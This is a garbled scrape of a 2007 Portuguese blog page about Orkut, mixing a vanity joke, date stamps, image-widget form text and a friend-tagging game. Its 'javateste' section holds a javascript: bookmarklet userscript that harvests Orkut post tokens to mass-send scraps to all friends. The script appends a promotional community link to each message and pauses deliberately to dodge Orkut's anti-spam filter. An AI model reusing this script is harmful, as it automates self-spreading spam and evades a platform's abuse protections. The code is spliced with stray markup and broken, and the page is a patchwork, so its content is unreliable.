NOSSA!!!!QUE OLHOS LINDOS...
QUE BOCA LINDA...
QUE SORRISO LINDO...
QUE CABELOS MACIOS...
QUE JEITO EDUCADO...
QUE ROSTO PERFEITO...
QUE PELE MARAVILHOSA...
QUE OLHAR SEXY...
QUE CORPO MARAVILHOSO...
NOSSA, COMO PODE TUDO ISSO EM UMA PESSOA SÓ???
TANTA BELEZA JUNTA!!!MAS CHEGA DE FALAR DE MIM.....
E VOCÊ, COMO ESTÁ?????
camara fria
CÂMARA FRIGORIFICA
quinta-feira, 25 de outubro de 2007
terça-feira, 23 de outubro de 2007
picker_color



Exemplo: http://www.animeseuespaco.com/nome_da_imagem.jpg
Dica: Para saber o endereço de uma imagem, basta clicar com o botão direito do mouse sobre a imagem, escolher no menu 'propriedades' e copiar o endereço da imagem.



Exemplo:http://www.orkut.com/Album.aspx?uid=7196620653
Fique Tranquilo:O AnimeSeuEspaco não tem acesso a nenhuma informação de seus dados do orkut, não guardaremos nenhuma das informações fornecidas neste formulário. O AnimeSeuEspaco não tem nenhuma relação com o Orkut.



Exemplo: vibeflog - Onde vibeflog é o login
Fique Tranquilo:O AnimeSeuEspaco não tem acesso a nenhuma informação de seus dados do Vibeflog, não guardaremos nenhuma das informações fornecidas neste formulário. O AnimeSeuEspaco não tem nenhuma relação com o Vibeflog.

Com problemas? Clique aqui!





| Cor de fundo do Slide | Cor do texto da descrição | Cor de fundo da descrição |
domingo, 21 de outubro de 2007
sábado, 20 de outubro de 2007
vo nao vo
Pessoal, decidi fazer uma brincadeira do Eu vô, Num vô, sendo muito simples. Você escolherá 7 pessoas do seu Orkut para colar um adesivo de Eu Vô e 7 pessoas do seu Orkut para colar o adesivo Não Vô lembrando que você pega o código logo abaixo da imagem da brincadeira.
PARTICIPE:
terça-feira, 16 de outubro de 2007
Assinar:
Postagens (Atom)
javateste
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src= // ==UserScript== // @name scrap on 280 // @author Spiky modded more (versão traduzida por esoG) // @provided by http://www.orkut.com // @description It sends scrap to all of ur friends at once!! // @include *.orkut.com/Scrapz.aspx* // ==/UserScript== function fwScrap() { document.title = "Enviar recados para todos amigos"; function createXMLHttpRequest() { try { return new XMLHttpRequest; } catch (e) { try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { alert("Its navigating n \ xE3o possesss support \ xE0 technology AJAX!"); return false; } } } } function getPostSig(exc) { var xml = createXMLHttpRequest(); xml.open("GET", "/Scrapbook.aspx", true); xml.onreadystatechange = function () {if (xml.readyState == 4) {var xmlr = xml.responseText;POST = xmlr.match(/name="post_token" value="([^"]+)/i);SIG = xmlr.match(/name="signature" value="([^"]+)/i);document.getElementsByTagName("input").POST_TOKEN.value = POST[1];document.getElementsByTagName("input").signature.value = SIG[1];eval(exc);}}; xml.send(null); } function loadFriends() { var xml = createXMLHttpRequest(); xml.open("GET", "/Compose.aspx", true); xml.onreadystatechange = function () {if (xml.readyState == 4) {var xmlr = xml.responseText;POST = xmlr.match(/name="post_token" value="([^"]+)/i);SIG = xmlr.match(/name="signature" value="([^"]+)/i);document.getElementsByTagName("input").POST_TOKEN.value = POST[1];document.getElementsByTagName("input").signature.value = SIG[1];var div = document.createElement("div");div.innerHTML = xmlr;for (var x = 0; x < div.getElementsByTagName("select").length; x++) {if (div.getElementsByTagName("select")[x].getAttribute("name") == "oneFriend") {var select = div.getElementsByTagName("select")[x].cloneNode(true);break;}}select.setAttribute("onchange", "document.getElementsByTagName('input')['oneFriendRadio'].checked=true");document.getElementById("friendSelector").innerHTML = "";document.getElementById("friendSelector").appendChild(select);document.getElementById("focus").style.display = "none";document.getElementById("divLoad").style.display = "none";}}; xml.send(null); } function wait() { antiF = 1; showTime(); } function showTime() { if (timeWait > 0) { document.getElementById("status").innerHTML = "" + timeWait + " minute (s) to finish the Anti-Filter pause "; timeWait--; setTimeout("showTime()", 60000); } else { timeWait = 20; index++; getPostSig("sendScrap()"); } } antiF = 1; index = 1; timeWait = 20; function sendScrap() { if (document.getElementById("oneFriendRadio").checked && !document.getElementsByTagName("select").oneFriend.value) { alert("Escolha o amigo para quem o scrap deverá ser mandado"); return false; } if (!document.getElementById("body").value) { alert("Por favor escreva o recado"); return false; } if (index == document.getElementsByTagName("select").oneFriend.length) { alert("Recado enviado!"); return; } var name = ""; var primeiro = []; var pattern = 0; primeiro = document.getElementById("oneFriendRadio").checked ? document.getElementsByTagName("select").oneFriend[document.getElementsByTagName("select").oneFriend.selectedIndex].text.split(" ") : document.getElementsByTagName("select").oneFriend[index].text.split(" "); name = primeiro[0]; pattern = name.match(/[a-zA-Z]+/); y = 1; while (!pattern && primeiro.length > y) { pattern = primeiro[y].match(/[a-zA-Z]+/); if (pattern) { name = primeiro[y]; } pattern = name.match(/[a-zA-Z]+/); y++; } var scrapText = document.getElementById("body").value.replace(/%NAME%/g, name).replace(/\[(\/)?link\]/g, "") + "\n\n\n[purple]\n\n\n
<><><><><><>" + "
; ; c.appendChild(a); void(0)
[b][:)] APRENDA COMO ENVIAR RECADOS PARA TODOS SEUS AMIGOS! [link=http://www.orkut.com/Community.aspx?cmm=36573235]CLIQUE AQUI [/link]
"; var send = document.getElementById("oneFriendRadio").checked ? "POST_TOKEN=" + encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value) + "&signature=" + encodeURIComponent(document.getElementsByTagName("input").signature.value) + "&scrapText=" + encodeURIComponent(scrapText) + "&toUserId=" + document.getElementsByTagName("select").oneFriend.value + "&Action.submit=" : "POST_TOKEN=" + encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value) + "&signature=" + encodeURIComponent(document.getElementsByTagName("input").signature.value) + "&scrapText=" + encodeURIComponent(scrapText) + "&toUserId=" + document.getElementsByTagName("select").oneFriend[index].value + "&Action.submit="; var xml = createXMLHttpRequest(); xml.open("POST", "/Scrapbook.aspx", true); xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;"); xml.send(send); xml.onreadystatechange = function () {if (xml.readyState == 4) {if (xml.status != 200) {setTimeout("sendScrap()", 500);return;}document.getElementById("sendedScraps").innerHTML += sendedScrap(name, index % 2);document.getElementById("counterScraps").innerHTML = index;if (document.getElementById("oneFriendRadio").checked) {alert("Scrap sent");return;}if (antiF < 450) {antiF++;index++;setTimeout("sendScrap()", 1200);} else {wait();}}}; } function sendedScrap(name, n) { var span = n ? "" + name + "" : "" + name + ""; return span; } function insertName() { txtarea = document.getElementById("body"); txtst = txtarea.scrollTop; txtsl = txtarea.scrollLeft; selLength = txtarea.textLength; selStart = txtarea.selectionStart; selEnd = txtarea.selectionEnd; s1 = txtarea.value.substring(0, selStart); s2 = txtarea.value.substring(selStart, selEnd); s3 = txtarea.value.substring(selEnd, selLength); txtarea.value = s1 + " %NAME% " + s2 + s3; txtarea.selectionStart = selStart + 10; txtarea.selectionEnd = selStart + 8 + s2.length; txtarea.focus(); txtarea.scrollTop = txtst; txtarea.scrollLeft = txtsl; } link = document.createElement("link"); link.href = "http://img3.orkut.com/img/i_scrap.gif"; link.rel = "SHORTCUT ICON"; link.type = "image/x-icon"; style = document.createElement("style"); style.textContent = "\n span.row1 {\n background-color: #BFD0EA;\n display: block;\n margin-left: 5px;\n }\n span.row0{\n background-color: #C9D6EB;\n display: block;\n margin-left: 5px;\n }\n\n #focus{\n position:fixed; \n width:100%; \n background:red; \n height: 100%; \n z-index: 1; \n left: 0; \n top: 0; \n opacity:.5; \n background-color: #000000;\n }\n #divLoad{\n position:fixed;\n background:#E5ECF4; \n z-index: 2; \n padding:5px; \n border:solid #BFD0EA 2px;\n left:40%; \n top:150px;\n }"; document.getElementsByTagName("head")[0].appendChild(style); document.getElementsByTagName("head")[0].appendChild(link); img_load = "http://img393.imageshack.us/img393/8894/orkutcarregando1zx5.gif"; layout = " Visite a comunidade: http://www.orkut.com/Community.aspx?cmm=36573235" + " " + "
|















